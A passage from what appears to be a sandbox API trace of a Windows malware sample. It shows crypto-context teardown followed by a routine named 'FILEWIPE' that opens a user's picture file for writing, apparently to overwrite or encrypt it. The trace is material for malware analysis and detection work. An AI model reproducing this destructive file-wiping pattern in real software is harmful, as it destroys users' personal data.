lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.910] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.911] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.911] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.911] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.911] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.911] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.911] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.911] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.912] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.912] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.912] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.912] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.912] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.912] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.913] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.913] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.913] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.914] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.914] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0040.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x908cae0, ftLastWriteTime.dwHighDateTime=0x1d5c09c, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0x7c2100 [0040.915] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.915] CharLowerBuffW (in: lpsz="byte[4969]", cchLength=0xa | out: lpsz="byte[4969]") returned 0xa [0040.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.915] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0040.915] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.915] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.915] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.915] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.916] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.917] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.917] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\3q41yk8hnsn8x6d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0040.918] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.918] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.918] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.918] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.918] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.919] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.919] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.919] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.919] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.919] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.919] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", lpFilePart=0x0) returned 0x47 [0040.919] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", 